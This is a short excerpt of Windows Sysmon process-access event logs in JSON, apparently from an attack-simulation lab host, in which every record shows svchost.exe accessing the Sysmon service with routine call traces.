{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1458,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.255\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.255","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1459,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.255\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.255","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1460,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.255\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.255","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1461,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.281\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.281","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1462,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.281\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.281","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1463,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.281\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.281","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1464,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.281\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.281","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1465,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.281\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.281","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
